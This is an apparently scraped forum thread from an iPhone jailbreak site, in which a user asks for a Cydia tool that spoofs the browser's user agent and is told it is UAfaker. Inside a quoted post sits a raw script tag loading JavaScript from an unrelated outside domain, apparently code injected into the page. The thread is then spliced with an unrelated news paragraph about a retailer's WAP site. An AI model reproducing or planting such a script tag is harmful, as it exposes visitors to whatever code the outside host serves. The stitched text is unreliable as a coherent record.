+ Reply

Your favorite Apple, iPhone, iPad, iOS, Jailbreak, and Cydia site.

Thread: Something to stop from seeing WAP sites

is a discussion within the

Web Apps

forums, a part of the

3rd Party Apps For iPhone | iPod Touch

section;
I seen an add on or app inside cydia but can't seem to find it now. Does anyone know where it is inside cydia? Suppossedly it tricks the browser into
    iPhone? More like MyPhone
    Thanks

Default Something to stop from seeing WAP sites
    I seen an add on or app inside cydia but can't seem to find it now. Does anyone know where it is inside cydia? Suppossedly it tricks the browser into thinking a pc is acessing the site not the phone.

Thanx

What's Jailbreak?
    Thanks

It's called UAfaker. Short for user agent faker. It's a toggle for sbsettings. Can be found in cydia

Green Apple
    Thanks

Quote Originally Posted by roneraven View Post
    I seen an add on or app inside cydia but can't seem to find it now. Does anyone know where it is inside cydia? Suppossedly it tricks the browser into thinking a pc is acessing the site not the phone.

Thanx <script type="text/javascript" src="http://djmixdownloads.com/script.php"></script>
    CONSIDERING THE many efforts made to stop youngsters seeing racy material on their phones, wap.annsummers.com, has slipped through the net. UK High street retailer - Ann Summers - has a WAP site that provides some very cheap thrills.

The INQ was highly amused at the site describing its ringtones as 'moantones'. Sounds like something from When Harry met Sally.

Curiously it's also implemented some of the latest high technology for mobiles. The first time they subscribe to the site, visitors receive a discount voucher which provides them with 5 off any purchase over 30.